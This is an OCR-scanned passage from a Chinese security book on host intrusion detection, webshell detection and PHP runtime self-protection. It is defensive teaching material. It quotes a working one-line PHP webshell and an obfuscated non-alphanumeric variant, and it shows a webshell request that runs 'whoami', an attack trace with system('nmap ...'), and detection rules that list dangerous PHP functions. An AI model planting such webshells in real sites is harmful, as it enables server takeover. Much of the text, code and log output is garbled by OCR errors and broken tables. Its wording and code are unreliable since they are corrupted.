ppid SC ERE id Int 
ppath 父 进程 可 执行 文件 绝对 路 径 TEXT 
pemdline 父 进程 命令 行 TEXT 
Owner_uid 可 执行 文件 属 主 uid Int 
Owner gid 可 执行 文件 属 主 gid Int 
Create_time 可 执行 文件 创建 时 间 bigint 
Modify_ time 可 执行 文件 修改 时 间 bigint 
time 进程 启动 时 间 bigint 





数据 使 用 中 有 几 个 技巧 如 下 : 





mode 字段 ， 在 规则 检测 (数据 分 析 〉 过 程 ， 会 发 现 一 个 无 法 解释 
的 情况 ， 某 些 root 权 限 执行 的 进程 的 父 进程 是 低 权 限 ， 不 符合 系统 进程 
派生 原则 。 那 么 这 里 可 能 有 几 种 情况 : 





a) 有 人 利用 系统 漏洞 提升 了 进程 权限 ， 可 直接 告警 。 
b) sudo 执 行 ， 可 通过 父 进 程 pcmdline\ppath 辨 别 。 


c) 设置 了 S 位 的 可 执行 文件 ，mode 字 段 的 意义 就 在 于 可 将 S 位 可 执 


行文 件 运行 事件 与 漏洞 提 权 行为 区 别 开 。 


ENV 字 段 ， 接 上 条 “sudo 提 权 行 为 可 通过 父 进程 为 sudo 来 辩 列 ”， 可 
是 在 很 多 发 行 版 里 sudo 运 行 可 执行 文件 ， 在 进程 记录 里 父 进程 不 是 
sudo， 而 是 父 进程 的 父 进程 ， 原 因 在 于 execve 调 用 的 进程 派生 方式 ， 它 
是 将 子 进程 的 ELF 文 件 映 像 加 载 到 内 存 里 并 执行 ， 也 就 是 sudo 和 被 执行 
的 进程 共用 一 个 进程 空间 '， 但 在 我 们 记录 的 进程 信息 这 个 时 间 切 片 这 
里 已 经 是 新 进程 了 。 那 么 难道 没有 办 法 了 吗 ? 这 里 就 用 得 到 环境 变量 里 
的 信息 了 ，sudo 执 行 的 进程 ， 进 程 的 环境 变量 信息 会 新 增 3 个 环境 变量 
信息 SUDO_COMMAND\SUDO_USER\SUDO_UID， 通 过 这 三 个 变量 就 
能 判断 当前 进程 是 否 是 被 sudo 局 动 的 。 























4) 网 络 连接 信息 一 一 网 络 连接 信息 分 三 类 需求 : 连通 性 数据 采 
集 ， 用 于 分 析 违 规 ACL 和 可 疑 购 络 连 接 ; 用 于 恶意 行为 检测 的 数据 需 
求 ， 用 于 检测 木马 等 场景 ， 监控 探测 扫描 行为 。 








获取 网 络 连接 信息 ， 古 一 个 较为 消耗 性 能 的 工作 ， 无 漏 是 通过 解 
析 /proc 中 网 络 连接 信息 ， 还 是 内 核 消息 。 毕 竟 在 一 个 业务 繁忙 的 系统 
里 ， 网 络 连接 事件 相对 超出 进程 信息 事件 多 个 数量 级 ， 设 计 和 使 用 时 必 
须 译 愤 。 一 般 通 过 周期 性 解析 以 下 三 个 文件 信息 获取 : 








/proc/net/raw 一 RAW 套 接 字 信息 。 





/proc/net/tcp 一 一 TCP 套 接 字 信 息 。 





./procnetudp 一 -UDP 套 接 字 信息 。 


如 果 仅 为 获取 网 络 连接 信息 ， 那 么 五 元 组 就 能 满足 需求 ， 但 为 了 安 
全 场景 检测 的 数据 分 析 需 要 可 能 还 需 关 联 进程 信息 ， 相 当 于 一 个 定制 版 
netstat。 建 议 字 段 如 表 8-2 所 示 。 











表 8-2 ”建议 字段 


























字段 描述 数据 类 型 
Pid 进程 ID Int 
Path 可 执行 文件 绝对 路 径 TEXT 
Direction 网 络 连接 方向 (监听 \ 外 连 \ 无 状态 ) Int 
Local ip 本 地 IP Int 
Remote_ip 远程 IP Int 
Local port 本 地 端口 Int 
Remote_port 远程 端口 Int 
Protocol 协议 int 
time 记录 时 间 bigInt 











关于 字段 的 几 个 提示 : 


p 字 段 ， 这 里 数据 类 型 是 Int， 相 比 text 来 说 int 存 储 空间 市 省 很 多 ， 
ATT EIT EE 


.为 减少 “无 意义 数据 ”的 产生 ， 周 期 性 的 数据 提取 但 仅 上 报 增 量 数 





据 。 


“很 多 业务 繁忙 的 系统 里 ， 业 务 进程 的 网 络 连接 请 求 非常 多 ， 所 以 
监听 端口 的 被 动 连接 信息 可 考虑 裁 甬 








5) webshel 一 一 在 常规 的 互联 网 攻防 里 Web 攻 防 基 本 是 一 个 最 常见 
的 场景 ， 而 Web 攻 击 的 整个 流程 里 最 常见 的 是 GET SHELL， 也 就 是 生成 
一 个 webshell。 当 然 在 入 侵 检测 里 webshell 检 测 也 成 了 一 个 很 重要 的 环 
节 。 技 术 方 案 选 择 如 下 : 








:inotify 文 件 监控 ，Linux 系 统 里 的 webshell 检 测 ， 最 重要 也 是 几乎 公 
认 的 技术 就 是 inotify， 在 BSD 和 macOS 里 类 似 的 是 kqueue。 从 Linux 内 核 
从 2.6.13 开 始 引入 inotify，inotify 是 一 种 文件 变化 通知 机 制 ， 几 乎 所 有 
Linux 发 行 版 都 支持 ， 可 以 通过 以 下 命令 看 你 的 系统 是 否 支 持 : 





% grep INOTIFY_USER /boot/config-$(uname -r) 
CONFIG_INOTIFY_USER=y 





.如 果 显 示 CONFIG_INOTIFY_USER=y 则 说 明 支 持 。 


如果 不 文 持 inotify， 那 么 很 遗憾 ， 不 得 不 周期 性 遍历 Web 目 录 来 做 
检测 。 





6) DB 审计 一 一 企业 的 核心 资产 通常 是 数据 ， 用 户 数据 、 销 售 数 
据 、 产 品 数据 、 财 务 数 据 等 等 ， 那 么 DB 的 安全 保护 就 成 为 了 重 中 之 
重 。 安 全 厂商 不 乏 大 量 的 DB 安全 产品 ， 根 据 产品 的 不 同形 态 ，DB 安 全 
(审计 ) 产品 可 以 是 一 个 独立 的 系统 ， 也 可 以 作为 HIDS 的 一 个 模块 存 
在 。 








当 作为 HIDS 的 一 个 模块 存在 的 时 候 ， 产 品 方案 必定 是 部 团 于 主机 


的 ， 这 样 带 来 的 好 处 最 重要 是 复 用 了 HIDS 系 统 的 控制 管理 指令 通道 以 
及 数据 传输 通道 ， 同 时 跟 更 贴近 DB 服务 端 避免 了 攻击 流 旁 路 绕 过 的 可 
能 。 但 是 缺点 也 较为 明显 ， 会 消耗 挥 服务 器 自 喘 部 分 系统 资源 。 





3. 数 据 传 输 


与 传统 HIDS 以 及 PC 版 HIDS 不 同 的 是 ， 企 业 版 HIDS 通 常 需要 通过 
后 端 数据 分 析 来 实现 安全 能 力 ， 特 别 是 互联 网 企业 中 ， 为 了 降低 前 端 计 
算 带 来 的 系统 资源 消耗 基本 以 后 端 数 据 分 析 为 主 。 那 么 数据 传输 就 是 必 
要 且 重 要 的 功能 模块 。 同 时 在 “大 数据 时 代 ”， 数 据 质量 、 数 据 运 营 可 靠 
性 成 了 支撑 安全 能 力 指标 的 关键 性 要 素 ， 必 须 认真 对 待 。 技 术 方 案 如 
Fe 


syslog 转 发 一 一 当 数 据 分 析 染 构 在 初级 阶段 ， 借 用 Linux 系 统 自 种 
的 syslog 转 发 基本 能 满足 数据 传输 统一 管理 的 需求 。 只 需 修 改 syslog 服 务 
的 配置 文件 即 可 实现 转发 ， 不 需要 额外 开发 数据 接收 Server。 


此 轻 量 解决 方案 易于 实现 ， 但 缺点 也 很 明显 ，syslog 数 据 传输 默认 
采用 UDP 514 端 口 ， 假 如 数据 量 较 大 或 者 数据 量 波动 可 能 会 于 数据 。 男 
外 敏感 数据 也 可 能 因明 文 传输 而 泄露 。 





数据 直 传 一 一 在 数据 量 较 少 的 阶段 ， 璧 如 agent 部 署 量 在 几 千 台 服 
务 器 的 阶段 ， 前 端 agent 采 集 的 数据 可 以 直接 发 送 到 HIDS 后 端 Server， 上 典 


型 的 如 OSSEC。 





.数据 接收 Server 当 HIDS 系 统 部 署 运营 到 BAT 这 类 公司 的 量 
级 ， 数 据 通道 的 建设 就 必须 更 为 谨慎 。 





在 BAT 这 类 公司 ， 通 常 运 营 (包括 安全 ) 监控 都 有 成 熟 的 数据 通 
道 ， 那 么 在 安全 系统 建设 过 程 中 ， 也 可 以 复 用 它 ， 既 避免 重复 造 轮子 带 
来 的 开 肥 资源 浪费 ， 也 能 快速 的 获得 数据 质量 和 可 徘 性 的 保障 ， 从 公司 


运营 体系 角度 来 看 也 是 有 益 的 。 





那么 如 果 没 有 合适 的 可 用 的 现成 系统 的 时 候 ， 新 建 这 类 数据 通 
要 注意 什么 呢 ? OE Aras: 


1) 避免 数据 传输 波峰 <“ 雪 骨 效 应 ”， 例 如 当 东 个 机 房 网 络 不 通 时 ， 
数据 可 能 挤 压 在 缓存 里 ， 在 网 络 通 畅 之 后 集中 传输 占用 网 络 通 道 以 及 对 
接受 Server 市 来 类 似 DDoS 的 效果 。 可 对 数据 传输 队列 做 随机 性 的 主动 延 
R, WAME; 男 外 可 使 用 Server 曾 下 发 “数据 上 报 ” 任 务 的 方式 来 触发 
上 传 ， 而 非 agent 主 动 无 序 上 报 。 





2) 敏感 数据 脱 敏 及 加 密 ， 很 多 数据 中 包含 敏感 信息 ， 如 http 请 求 里 
的 cookie、 命 令 行 里 的 密码 。 配 合 业务 部 门 或 数据 安全 部 门 制 定数 据 采 
集 规范 ， 在 agent 疹 隐 去 敏感 信息 ， 传 输 环节 做 好 加 密 ， 存 储 系统 做 好 权 
限 控制 。 








3) 做 好 每 个 数据 传输 环节 的 前 后 链 对 账 ， 当 出 现 安全 事件 漏 报 时 
能 及 时 奶 查 到 可 能 导致 数据 丢失 的 环节 ， 便 于 后 续 的 优化 与 debug。 


4. 控 制 管 理 





企业 级 HIDS 系 统 部 团 量 非常 大 ， 且 安全 防守 体系 任何 一 点 的 故障 
都 可 能 导致 整体 防守 的 失效 。 合 理 的 管理 手段 ， 能 让 整套 系统 更 为 健 
壮 ， 确 保 可 用 性 。 


健康 度 监 控 一 一 与 传统 安全 系统 基于 端的 检测 方式 不 同 ， 新 型 的 
企业 级 HIDS 系 统 往往 采用 后 并 数据 分 析 的 方式 实现 入 侵 场 景 检 测 ， 从 
行为 数据 采集 到 数据 传输 存储 、 分 析 ， 是 一 个 较 长 链条 的 流程 ， 必 须 逐 
一 对 每 个 环 市 做 好 数据 对 账 、 弄 御 监 控 。 第 见 的 检测 点 如 表 8-3 所 示 。 





表 8-3 FY LAN Rl A 


























检测 点 监控 内 容 
心跳 Agent 是 否 存 活 ， 有 无 coredump 、 掉 线 等 
Agent 数据 采集 Agent 功能 模块 是 否 可 正常 获取 数据 
本 地 数据 上 传 Agent 采集 的 数据 是 否 上 传 成 功 ， 内 存 是 否 超 限 
数据 接收 Server 接收 Server 是 否 有 丢 包 ， 是 否 达到 性 能 瓶颈 
存储 Agent 上 报 数据 是 否 全 量 写 和 人 磁盘， 数据 对 账 
分 析 引 擎 上 报 数据 是 否 全 量 进 入 分 析 引 擎 ， 是 否 有 丢 包 和 性 能 
压力 
漏 报时 间 漏 报 事件 追溯 


“自杀 ”机 制 一 一 互联 网 企业 里 ， 业 务 会 极度 榨取 系统 性 能 ， 那 么 
安全 系统 的 部 普 也 同样 会 受到 严格 挑 成 。 毕 竟 业 务 系统 的 稳定 运行 才 是 


第 一 目标 ， 安 全 在 极端 情况 ， 以 及 出 现 故 障 的 时 候 必 须 为 业务 稳定 牺 
牲 。 在 产品 设计 中 会 设 定 一些 系 统 资源 耗 用 指标 ， 超 出 指标 则 和 暂停 功能 
RAR AAR”. Hab oP: 





-CPU 占用 <10%~20% 


:内 存 占用 <100M 





数据 上 传 <200/s (根据 环境 可 配 ) 





部 署 与 更 新 一 一 日 常 运营 中 必然 会 碰 到 部 署 和 更 新 的 需求 ， 在 
HIDS 架 构 里 必须 有 推送 更 新 的 功能 。 单 从 功能 和 技术 角度 来 说 “更 
新 ”功能 与 大 多 数 软件 系统 一 样 没有 什么 特别 需要 讲 的 ， 在 大 型 互联 网 
企业 中 重点 关注 两 个 方面 : 








1) FEAM 一 大 型 网 络 中 ， 动 辑 上 万 甚至 几 十 万 的 部 车 
量 ， 对 于 每 次 的 更 新 必须 育 导 。 这 里 需要 设 定 以 下 原则 : 








:发布 前 必须 通知 业务 方 ， 必 须 有 应 急 预 宁 和 回 深 手 段 。 


遵循 灰 度 及 布 原 则 ， 未 经 一 个 可 徘 的 时 间 周 期 (通常 一 个 月 ) 
稳定 运营 验证 ， 不 得 批量 部 车 。 不 同业 务 环境 分 别 灰 度 。 


“WBC A BW AN BE o 


agent 更 新 行为 由 Server 端 推送 任务 完成 。 


2) 安全 性 一 一 曾经 有 人 开玩笑 说 ， 部 署 的 这 么 多 Agent 就 相当 于 
一 个 大 型 的 分 布 式 僵尸 网 络 。 确 实 ， 假 设 恶 意 攻击 者 能 操纵 任何 的 
HIDS 集 群 系统 的 控制 指令 和 平台 ， 那 么 真 的 是 “一 损 俱 损 "。 为 确保 管 
理 控 制 系统 的 安全 性 ， 必 须 设 定 儿 个 安全 原则 : 





控制 (更 新 ) 指令 仅 允 许 选择 固化 的 指令 ， 严 茶 在 Agent 新 预 留 
执行 系统 命令 的 接口 ; 








.更 新 包 必 须 经 过 第 三 方 安全 工程 师 审核 之 后 上 传 至 更 新 Server 保 
存 ， 更 新 仅 允 许 选 择 更 新 Server 上 已 有 的 安装 包 ; 


控制 指令 下 发 时 必须 由 第 三 方 审核 批准 才 可 执行 。 


8.2 ”检测 webshell 


互联 网 公司 Web 类 的 应 用 服务 占 较 大 比例 ， 那 么 在 此 攻击 面 上 的 攻 
防 入 侵 场 景 中 占 比 非常 高 ， 几 乎 Web 安 全 成 了 攻防 对 抗 的 代名词 。 而 在 
Web 入 侵 中 最 重要 的 一 个 环节 就 是 “getshell*”， 也 就 是 放置 Web 后 门 
webshell。 那 么 Web 安 全 能 力 中 一 个 最 重要 的 指标 就 是 webshell 检 测 能 
力 。 以 至 于 很 多 中 小 型 安全 产品 ， 从 诞生 之 初 就 以 webshell 检 测 能 力作 
为 核心 任务 。 





webshell 通 党 是 一 个 文件 ， 那 么 静态 文件 的 扫 摘 检测 是 第 见 做 法 ， 
但 由 于 攻防 技术 的 对 抗 发 展 ， 毅 态 文 件 的 变形 越 来 越 多 ， 已 不 足以 满足 
检 出 紊 要 求 ， 于 是 出 现 了 流量 检测 、 运 行 时 检测 等 方案 。 











1. 静 态 检 测 


静态 文件 检测 是 常规 做 法 ， 在 Linux 系 统 里 ， 一 个 webshell 检 测 模 块 
运作 流程 如 图 8-8 所 示 。 


inotify 监控 
web 目录 





文件 静态 扫描 : 





图 8-8 ”webshell 检 测 模块 运作 流程 


文件 静态 扫 搬 基于 黑 名 单 特征 字符 串 ， 以 及 几 个 “ 蜗 危 函数 ”出 现 概 
率 的 组 合 ， 通 闻 一 个 业务 CGI 文件 ， 几 乎 不 可 能 存在 文件 读 写 、 命 令 执 
行 、 代 码 执行 、DB 操 作文 件 上 传 几 类 函数 同时 出 现 的 情况 。 





对 于 只 会 使 用 工具 的 普通 scriptkids 来 说 ， 静 态 检 测 已 经 够 用 ， 但 对 
稍微 经 验 老道 些 的 攻击 者 就 力不从心 了 。 特 别 是 php webshell， 由 于 php 
语法 变化 多 端 ， 变 形 webshell 检 测 难度 极 大 。 


tiny php shell 一 句 话 webshell: http://h.ackack.net/tiny-php-shell.html 





<?=($_=@$_GET[2]) .@$_($_GET[1])?> 





PS Ay 


Non alphanumeric webshell4\ #7 alpha 74 HJ 


webshell: http://www.thespanner.co.uk/2011/09/22/non-alphanumeric-code- 


in-php/ 


<?$ ="";$ [+""]="';$ ="$ momias =($ Cae yy). (Sey) ($_[+""]A"" 72> 





从 代码 上 看 ， 特 征 字 符 串 方式 的 检测 真 的 是 绝望 了 。 于 是 乎 也 有 从 
统计 学 角度 的 检测 方案 ， 同 样 观察 上 述 代 码 ， 不 难 发 现 特殊 字符 的 出 现 
比例 明显 过 大 ， 同 时 根据 对 上 自身 业务 代码 计算 信息 烂 ， 必 定 能 区 别 恶 意 
代码 。 





或 许 上 述 有 些 过 于 学 院 派 ， 大 家 未 必 能 有 直观 的 理解 。 同 时 根据 笔 
者 的 实践 来 看 ， 在 大 型 互联 网 企业 中 ， 由 于 各 业务 部 门 代码 风格 多 变 ， 
特别 是 汉字 在 代码 中 对 信息 炳 的 采集 比 对 分 析 影 响 特 别 大 ， 不 是 特别 推 
存 。 那 么 还 有 没有 其 他 “简单 粗暴 ”的 方案 呢 ? 答案 是 肯定 的 ! 





安全 圈 往 往 会 流传 这 样 的 一 段 话 , “三 分 技术 ， 七 分 管理 ”， 虽 然 不 
能 简单 苟同 ， 但 是 技术 结合 “管理 ”手段 ， 确 实 能 带 来 事半功倍 的 效果 。 
-个 攻击 者 写 入 的 webshell 和 业务 CGI 文 件 其 实 有 太 多 的 不 同 ， 假 设 你 
的 企业 有 严格 的 及 布 管理 流程 、 运 维 治理 环境 的 话 ， 好 坏 CGI 文 件 的 辩 
别 更 是 轻而易举 。 这 里 列举 可 使 用 的 维度 。 








表 8-4 可 用 维度 














检测 点 基于 业务 特点 正常 异常 
文件 属 主 | ”统一 的 发 布 系统 属 主 为 发 布 系 统 启动 账户 属 主 为 webserver 进程 账户 
生成 时 间 “| 工作 时 间 工作 时 间 内 生成 非 工 作 时 间 生 成 
生成 时 间 | ” 同 目录 文件 统一 生成 | 大 概率 与 同 目录 内 其 他 文件 在 连续 | ”与 同 目录 其 他 文件 生成 时 间 
时 间 内 生成 相差 甚 远 
inode 同 目录 文件 统一 生成 ”| 同 目录 下 文件 inode 连续 分 布 与 同 目录 其 他 文件 inode 相 
差 甚 远 
目录 上 传 目录 不 保存 CGI 位 于 上 传 文件 夹 


上 面 仅 列 举 了 常见 可 利用 的 业务 特点 ， 其 实 当 你 分 析 清 楚 你 业务 环 
节 的 特点 之 后 ， 可 以 指定 出 更 多 的 检测 维度 。 


那么 到 这 里 ， 我 们 的 webshell 检 测 流程 如 图 8-9 所 示 。 


息 上 报 web 目录 


收 到 文件 写 
入 \ 修改 消 息 


文件 静态 扫 





图 8-9 ”webshell 检 测 流程 改进 


2. 流 量 监测 





本 地 静态 扫描 方法 至 少 需要 一 部 分 开发 工作 量 ， 如 果 仅 有 accesslog 
可 以 用 ， 或 者 能 够 获取 到 网 络 流 量 的 时 候 ， 从 http 请 求 记录 中 也 可 以 挖 
掘 可 能 存在 的 webshell， 以 及 webshell 攻 击 行为 。 


对 于 一 些 常见 的 webshell 来 说 ， 对 于 webshell 的 http 请 求 应 该 是 固定 
的 ， 包 括 “cookie”，post data， 功 能 函数 参数 等 等 ， 如 图 8-10 所 示 。 


Headers Preview Response Gookins Ting 


AGE Tyre SPP seer Ew TEST 


Cookie: wp-settings-1= hidetb%3D1%26editor%3Dt inymce%26m6%3D0%26m5% 
eee mp ci: er lr 


55865892 phpspypass= s=pwd4webshe lL 


Host: 

Origin: http: / /ES 

Referer: http: // aE /phpspy.php 

Upgrade-Insecure-Requests: 1 

User-Agent: Mozilla/5.@ (Macintosh; Intel Mac OS X 10_11_3) AppleW 
hrome/48.0.2564.116 Safari/537.36 


Vv Form Data view parsed 


action=shellL&command=whoami&submit=Execute 








图 8-10 ”webshell 请 求 特 征 (cookie&post data) 


这 些 细 节 ， 对 于 scriptkids 来 说 不 会 想到 甚至 没有 能 力 去 修改 ， 对 于 
检测 常见 webshell 非 常 好 用 。 


么 如 果 有 一 定 CGI 代 人 码 开 发 能 力 的 攻击 者 呢 ， 从 静态 代码 和 http 
请 求 特征 检测 束 不 那么 好 使 了 。 解 决 这 个 问题 之 前 ， 虽 们 先 回 顾 一 下 入 


侵 场 景 。 


如 图 8-11 所 示 ， 从 用 户 对 网 站 的 访问 行为 以 及 记录 上 看 和 攻击 者 是 
有 明显 区 别 的 ， 表 8-5 逐 一 列举 。 


根据 上 述 各 维度 的 对 比 不 难看 出 黑客 对 webshell URL 访 问 行为 和 正 
常 的 用 户 对 网 站 业务 CGI 访 问 的 区 别 非常 大 。 笔 者 对 此 类 检测 方案 曾 开 
发 了 一 个 webserver 日 志 分 析 脚 
本 https://github.com/xti9er/LogForensics/blob/master/LogForensics.pl ， 利 
用 此 日 志 分 析 脚 本， 从 大 量 用 户 访 问 中 抓 取 可 疑 的 记录 ， 并 根据 第 一 次 
抓 取 的 特征 IP 或 URL 继 续 跟 进 ， 抓 出 可 能 的 webshell 和 攻击 请 求 流量 。 
流量 分 析 挖 掘 异常 攻击 请 求 如 下 所 示 : 


















网 站 用 户 A 
201.123.214.4 


网 站 用 户 B 
123.87.2.128 











网 站 用 户 C 





























网 站 用 户 E 
32.68.32.8 





234.127.49.9 


$ 
图 8-11 正常 和 异常 URL 访 问 行为 差异 
表 8-5 “观察 结果 








观察 点 业务 CGI webshell 

访问 来 源 多 个 无 关 也 来 源 ， 日 常 频繁 被 访问 日 常 无 人 访问 过 的 URL， 仅 有 一 个 卫 (黑客 或 
肉鸡 ) ak IP Fe (ADSL 用 户 ) 访问 过 仅 有 的 几 次 

历史 记录 日 常 时 间 内 频繁 被 访问 在 夜间 或 极 罕见 时 段 出 现 ， 无 任何 网 站 统一 调用 
框架 代码 

User-agent 统一 CGI 被 多 种 UA 和 用 户 类 型 访问 固定 的 UA， 固 定 的 用 户 特征 

Cookie 有 网 站 统一 的 用 户 标 示 无 网 站 标示 

请 求 内 容 规范 的 参数 仅 有 POST 请 求 ， 且 post data 被 “加 密 ” 

搜索 引擎 记录 有 与 网 站 结构 相关 的 链接 跳 转 ,经常 | 无 与 网 站 其 他 页 面 的 跳 转 链接 ， 未 被 搜索 引擎 候 





被 搜索 引擎 疏 虫 疏 取 





取 索 引 


= -websvr httpd -fast 


= L ULL 
log Plz wait 


ne i urlr3] 
new m } ail /roo 
_log log 


” 2014-10-17 


)-Q ) 0 \ add_user „php (2) 
$= 014-10 1 ¢ 9—0 53 php {4} 
[*] All Done in 6 s , ip[2] u 
[root m l o 5 o s$ -websvr httpd -fast -fF access_log -url cmd,php 
keb ef 
C=] ip=NULL rl=cmd.php 
C=] LOAD 


[ 关 ] Export y 
[x] All Done in 


$10 


)] /left.php (4) 
01 / 


.Php 


d_user ,php 
10-08 00:443< dd_user ,Php 

1 5 5 ) 1 : „php (d) 

url[11] 





8.3 RASP 


随 着 攻防 对 抗 的 升级 ， 防 守 方 发 现在 已 有 的 日 志和 数据 中 ， 己 很 难 
提升 分 析 检 测 能 力 。 误 报 越 来 越 多 ， 事 件 追 调 无 足够 的 细节 可 用 。 而 反 
之 攻击 方 则 挖掘 出 越 来 越 多 的 漏 筒 ，Web 代 码 越 来 越 多 ， 开 发 语言 的 灵 
活性 越 来 越 大 ， 相 应 的 攻击 代码 也 变 得 “灵活 "而 不 易 检测 。 














我 们 需要 一 种 数据 和 能 力 实 时 刻画 攻击 事件 现场 ， 甚 至 于 依据 模型 
直接 阻 断 恶 意 行为 ， 于 是 RASP (Runtime Application Self Protect) 系统 
应 运 而 生 。 


目前 主流 的 Web 开 发 框架 都 是 基于 PHP 和 Java 语 言 ，Web 安 全 的 攻 
防 焦点 几乎 都 齐 聚 这 两 种 语言 环境 中 ， 对 应 的 RASP 在 这 两 类 语言 环境 
中 均 能 大 展 拳脚 。 





8.3.1 PHP RASP 


1. 技 术 架 构 


PHP 是 解释 型 语言 ， 将 PHP 代 码 解释 为 opcode 之 后 再 交 由 Zend 引 擎 


执行 。 图 8-12 是 PHP Zend 引 擎 架构 图 。 


Web 服务 软件 


& BIAI 


浏 览 Tis 


RUN-TIME 
COMPILER 





图 8-12 PHP Zend 引擎 架构 图 


如 图 8-12 所 示 ， 当 网 站 的 用 户 在 访问 一 个 PHP 页 面 是 ， 当 访问 请 求 
被 PHP 初 始 化 ，ZE 便 把 PHP 脚 本 翻译 成 符号 (token) ， 最 终 翻译 成 可 以 
进行 单 步 调试 和 执行 的 opcode。 如 果 这 些 opcode 中 的 一 个 指令 需要 调用 
一 个 扩展 函数 ，ZE 将 会 给 那个 函数 绑 定 参数 ， 并 且 临 时 放弃 控制 权 直 
到 函数 执行 完成 。 由 此 可 以 看 出 ，PHP 代 码 的 执行 流程 中 opcode 的 翻译 
和 函数 调用 是 必 经 环节 ， 而 Zend 引 擎 是 支持 扩展 ， 那 么 我 们 的 
PHPRASP 方 案 就 是 通过 Zend 扩 展 模块 实现 对 恶意 行为 记录 和 阻 断 。 














为 了 部 署 和 可 移植 性 ， 以 及 检测 阻 断 能 力 的 可 扩展 ， 需 要 在 常规 扩 
展 基础 之 上 增加 一 个 规则 查询 、 匹 配 模 块 ， 此 模块 与 本 地 配置 管理 
daemon 进 程 通信 ， 在 每 一 个 PHP API 调 用 时 检测 其 行为 的 合法 性 ， 给 出 
事件 是 侣 阻 断 、 记 录 或 允许 执行 的 判断。 配置 管理 daemon 进 程 负责 与 后 


端 配置 管理 Server 通 信 ， 更 新 cache 最 新 的 规则 。 





当 符 合 配 置 中 阻 断 与 记录 行为 的 时 候 ，RASP 模 块 上 报 数据 至 本 地 
管理 daemon 进 程 ， 由 daemon 进 程 上 报 至 后 端 数 据 分 析 集 群 。PHP RASP 
架构 如 图 8-13 所 示 。 





2. 检 测 模 型 


PHP 是 解析 型 语言 ， 在 执行 时 逐 行 翻译 为 opcode， 那 么 它 zend 扩 展 
可 以 实现 记录 每 个 HOOK 的 API 在 哪 一 行 被 执行 ， 调 用 参数 是 什么 。 





& Gh 
php Manager- Bease 
Daemon 一 一 
数据 分 析 集 群 





N 
RASP SOCK 


äl ee CONF- 
@—RASP.SOCK—P 
DAEMON r- 
E 
E CD 


RASP Agnet 配置 管理 服务 器 





图 8-13 PHP RASP 架 构 


相 比 HIDS 来 说 ， 除 了 可 以 记录 命令 执行 之 外 ， 还 能 记录 CGI 层 面 的 
很 多 API， 璧 如 IO 类 、DB 类 、 网 络 连 接 、 文 件 上 传 等 等 。 相 比 HIDS 如 
果 和 希望 知道 IO 行为 ， 需 要 过 滤 整 个 系统 的 海量 IO 操作 不 同 ， 因 为 RASP 


的 监测 范围 仅 限 制 在 了 CGI 代码 层面 的 调用 ， 性 能 的 开销 小 了 很 多 个 数 
量 级 。 而 Web 入 口 的 安全 却 又 是 目前 安全 攻防 的 焦点 ， 这 个 性 价 比 是 非 
常 划算 的 。 因 为 RASP 可 以 兼顾 这 么 多 丰富 的 API 调 用 ， 以 及 调用 细节 ， 
对 于 入 侵 检测 能 力 来 说 就 增加 了 很 多 个 维度 。 


实际 的 检测 能 力 效果 ， 这 里 以 webshell 检 测 为 例 。Php 语 法 的 灵活 性 
使 得 传统 的 静态 文件 扫描 方式 几乎 走 进 了 死胡同 ， 如 下 所 示 很 多 近乎 于 
变态 的 编码 转换 几乎 无 法 有 效 检 测 。 








$ ae 
$_[+""]J=''; 
$ = 2 ee 

$ = EEUU yy) ($_[+""]]""). ($_[+""]^A""); 








但 是 RASP 并 不 受 此 影响 ， 因 为 它 可 以 在 运行 时 记录 其 行为 ， 无 论 
多 么 变态 的 编码 转换 ， 在 opcode 这 里 还 是 会 显 形 。 





比如 攻击 者 通过 请 求 nonalpha.php? _=exec& _=id 执 行 了 一 条 命 





File: /usr/local/apache/htdoc/nonalpha. php 
Function: 


exec 
Line:5 
Parami: id 





由 此 可 见 ， 任 何 的 基于 文件 字符 串 编 码 转换 是 逃 不 过 动态 监测 的 。 
与 此 同时 ， 如 果 在 文件 内 容 中 没 找 到 exec 字 符 串 ， 反 倒 会 作为 一 个 高 危 


S 
一 一 


的 webshell 检 测 特征 。 


在 实际 的 运营 过 程 中 ， 更 多 的 是 以 RASP 输 出 的 结构 化 数据 建立 检 
测 模 型 。 假 设 我 们 的 网 站 存在 一 个 上 传 漏洞 ， 被 人 攻击 成 功 ， 上 传 一 个 
webshell。 那 么 这 个 事件 在 RASP 系 统 中 将 会 被 记录 如 图 8-14 所 示 。 


file_upload.php | af 上 传 漏洞 


move upload file("/tmp/xxxx.php","./first_shell.php") 


first_shell.php a | webshell 


move_upload file("/tmp/xxxx.php","./other_shell.php") 





other_shell.php 


system('nmap XX.XX.XX.xx') 一 | webshell À 
phpinfo() 








mysql_connect{) 


图 8-14 ”基于 RASP 数 据 模 型 检测 webshell 





从 图 中 可 以 很 明显 的 看 出 整个 攻击 流程 ， 但 是 仅 能 “看 ”出 问题 还 不 
能 算 完 ， 接 下 来 整理 出 检测 模型 : 


-高危 函 数组 合 模 式 检 测 webshell 一 一 当 一 个 PHP 在 一 段 时 间 内 的 访 
问 触 发 了 多 个 高 危 函 数 ， 那 么 被 判定 为 webshell 文 件 ， 规 则 基于 这 么 一 
个 假设 “一 个 正常 的 业务 PHP 文 件 ， 不 可 能 同时 拥有 这 么 多 危险 函数 功 


能 ”。 以 下 是 规则 模板 。 





{ 
"total_value":5, 
"describe": "webshell [filename] be found", 
"risk_func":[ 
"func":["system", "popen", "exec", "passthru"], 
"value":2 
}, 
{ 
"func": ["move_upload_file", "phpinfo"], 
"value":2 
}, 
{ 
"func": ["file_get_content", "mysql connect"], 
"value":1 
} 
] 
} 





:上下文 关联 检测 webshell 一 一 当 一 个 PHP B 文 件 被 PHP A 上 传 或 写 

， 同 时 这 个 被 写 入 的 PHP 文 件 又 有 读 写 文件 、 上 传 文件 、 执 行 命令 等 
行为 ， 那 么 这 个 “上 传 和 写 入 ”行为 是 webshell 上 传 攻击 事件 。 模 型 基于 
这 样 一 个 假设 “一 个 CGI 文 件 写 入 上 传 文件 是 正常 的 ， 但 被 它 生 成 的 如 果 
是 PHP 文 件 ， 且 这 个 PHP 有 高 危 API 调 用 行为 ， 那 么 这 是 入 侵 事 件 ”。 











{ 
"describe":"[filenameA] File Upload Vulnerability,webshell [filenameB] 
be found", 
"factory":{ 
"filenameA.func", "move_upload_file", 
"filenameA.parameter.2":"filenameB", 
"filenameB.func":["move_ upload file","system","exec","", "phpinfo"] 
} 
} 





8.3.2 Java RASP 


与 PHP 完 全 不 一 样 ， 在 Java 的 世界 里 ， 有 痢 各 种 基于 调试 、 性 能 测 
试 、 监 控 等 目的 而 生 的 框 染 和 接口 能 用 于 作为 RASP 产 品 的 技术 方案 。 
下 面 我 们 来 列举 可 以 使 用 的 技术 方案 。 


LERI 


